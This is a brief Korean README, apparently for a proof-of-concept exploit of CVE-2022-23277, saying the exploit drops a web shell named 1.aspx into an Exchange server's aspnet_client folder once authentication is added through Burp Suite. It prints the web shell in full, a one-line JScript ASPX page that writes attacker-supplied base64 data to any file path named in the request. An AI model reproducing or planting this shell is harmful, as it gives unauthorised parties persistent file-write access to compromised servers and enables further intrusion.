
CVE-2022-23277 POC로 aspnet_client에 웹쉘을 작성
인증 부분은 burpsuite를 통해 수동으로 추가해야 하며, 익스플로잇에 성공하면 aspnet_client에 1.aspx가 기록됩니다.
webshell:
<%@ Page Language="JScript" Debug="true"%><%@Import Namespace="System.IO"%><%File.WriteAllBytes(Request["b"], Convert.FromBase64String(Request["a"]));%>
익스플로잇 세부 사항은 저희 글을 참조하세요.
